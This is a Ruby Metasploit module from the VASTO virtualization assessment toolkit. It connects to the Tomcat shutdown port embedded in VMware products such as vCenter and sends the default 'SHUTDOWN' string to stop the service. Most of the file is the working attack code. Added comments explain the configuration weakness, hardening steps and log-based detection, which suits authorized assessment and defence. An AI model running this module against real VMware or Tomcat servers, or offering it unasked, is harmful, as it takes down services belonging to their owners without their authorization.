#################################################################
# #
# This module is part of VASTO #
# Version 0.4 #
# Virtualization ASsessment TOolkit #
# #
#################################################################
require 'msf/core'
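# VASTO module that sends the Tomcat shutdown command to a VMware-embedded
# Tomcat instance over TCP.
#
# Security context for reviewers and defenders: Tomcat's shutdown listener is
# configured by the `port` and `shutdown` attributes of the <Server> element
# in server.xml. Anyone who can reach that port and knows the shutdown string
# can stop the service, so the exposure is a configuration weakness rather
# than a memory-safety bug. Hardening options are to disable the listener
# (port="-1"), to replace the default shutdown string with a non-guessable
# value, and to keep the port unreachable from other hosts. On the detection
# side, Tomcat normally logs that a valid shutdown command was received on
# the shutdown port before it stops, which separates this from a crash.
class Metasploit3 < Msf::Exploit::Local
  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata and its two options.
  #
  # @param info [Hash] metadata passed in by the framework and merged with
  #   the values below through update_info.
  def initialize(info = {})
    # The description text is kept flush-left so the string is unchanged.
    super(update_info(info,
      'Name'           => 'VMware Tomcat killer',
      'Description'    => %q{
This module abuses the Tomcat server embedded in most VMware products, including Virtual Server vSphere 4.1-4.0 and vShield
which is left with an unchanged shutdown value by default.
},
      'Author'         => [ 'Claudio Criscione' ],
      'License'        => GPL_LICENSE,
      'Version'        => 'VMware Tomcat Killer 0.1',
      'Targets'        =>
        [
          # vCenter runs on Windows
          [ 'Windows Universal',
            {
              'Arch'     => ARCH_X86,
              'Platform' => 'win'
            },
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 28 2010'))

    # RPORT defaults to 8003 and RHOST to loopback; both are consumed by the
    # Tcp mixin's connect.
    register_options(
      [
        Opt::RPORT(8003),
        Opt::RHOST('127.0.0.1')
      ], self.class)
  end

  # Connects to RHOST:RPORT, writes the shutdown command and disconnects.
  #
  # The module does not verify that the service actually stopped; the final
  # status line only reports that the command was written to the socket.
  #
  # The previous version read datastore['PORT'] into an unused local (this
  # module only registers RPORT and RHOST) and swallowed every error with an
  # empty rescue, so a refused connection was indistinguishable from success.
  # Failures are now reported, still without raising, and the socket is
  # released on every path.
  def exploit
    print_status("Connecting")
    connect
    print_status("Connected, sending shutdown")
    # The command is a plain-text line; no authentication precedes it.
    sock.put("SHUTDOWN\n")
    print_status("Shutdown sent. Server should be down")
  rescue => e
    # Best-effort behaviour is kept: report the failure instead of raising.
    print_error("Shutdown request failed: #{e.class} #{e.message}")
  ensure
    # Runs on success and failure alike so the socket is not leaked.
    disconnect
  end
end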